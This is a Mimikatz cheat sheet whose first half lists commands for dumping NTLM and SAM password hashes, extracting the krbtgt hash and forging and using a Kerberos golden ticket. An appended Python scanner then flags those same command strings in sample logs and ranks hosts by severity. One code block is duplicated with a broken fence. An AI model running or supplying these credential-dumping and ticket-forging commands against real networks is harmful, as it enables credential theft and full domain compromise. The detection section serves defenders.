# Mimikatz Usage
* Check your privilege, boy
```sh
$ privilege::debug
```

## Dump hashes
* NTLM
```sh
$ lsadump::lsa /patch
```

## Dump Local Password hashes
```sh
token::elevate
```
```sh
lsadump::sam
```

## Golden ticket
* Dump krbtgt hashes and create a ticket; the ticket is saved as ticket.kirbi
```sh
$ lsadump::lsa /inject /name:krbtgt
$ kerberos::golden /user:<userid> /domain:<domainname> /sid:<number behind domainname> /krbtgt:<NTLMhash> /id:<RID(dec)>
```
* Use the golden ticket: open a new elevated prompt
```sh
misc::cmd
```sh
misc::cmd
```
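
For the defending side, the `module::command` strings on this page are stable indicators to hunt for in command-line or console telemetry. The scanner below is an added example, not part of the original cheat sheet; the `timestamp host captured-text` log layout, the sample lines, the stage labels and the severity mapping are all assumptions made for illustration.

```python
import re
from collections import defaultdict

# Commands listed on this page, mapped to a stage label (labels are this example's own).
STAGES = {
    "privilege::debug": "privilege",
    "token::elevate": "privilege",
    "lsadump::lsa": "credential-dump",
    "lsadump::sam": "credential-dump",
    "kerberos::golden": "ticket-forgery",
    "misc::cmd": "ticket-use",
}
TOKEN = re.compile(r"\b([a-z]+)::([a-z]+)\b", re.IGNORECASE)

# Constructed sample telemetry; the "timestamp host captured-text" layout is assumed.
SAMPLE = """\
2024-05-01T09:00:01Z WS01 whoami /groups
2024-05-01T09:00:05Z WS01 Privilege::Debug
2024-05-01T09:00:09Z WS01 lsadump::sam
2024-05-01T09:02:00Z DC01 privilege::debug
2024-05-01T09:02:10Z DC01 lsadump::lsa /inject /name:krbtgt
2024-05-01T09:02:30Z DC01 kerberos::golden /user:<userid> /domain:<domainname>
2024-05-01T09:03:00Z WS02 std::cout example
""".splitlines()

def scan(lines):
    """Return {host: [(timestamp, command, stage), ...]} for commands from this page."""
    hits = defaultdict(list)
    for line in lines:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue  # malformed record, nothing to inspect
        ts, host, text = parts
        for m in TOKEN.finditer(text):
            cmd = f"{m.group(1)}::{m.group(2)}".lower()  # match regardless of case
            if cmd in STAGES:
                hits[host].append((ts, cmd, STAGES[cmd]))
    return dict(hits)

def severity(events):
    """Rank a host by the most serious stage observed on it."""
    stages = {stage for _, _, stage in events}
    if "ticket-forgery" in stages:
        return "critical"  # krbtgt key presumed exposed: reset the krbtgt password twice
    if "credential-dump" in stages:
        return "high"      # treat local and domain credentials on the host as compromised
    return "medium"

if __name__ == "__main__":
    for host, events in scan(SAMPLE).items():
        print(host, severity(events), [cmd for _, cmd, _ in events])
```

String matching like this only catches unmodified command text, so pair it with behavioural telemetry such as LSASS process access events.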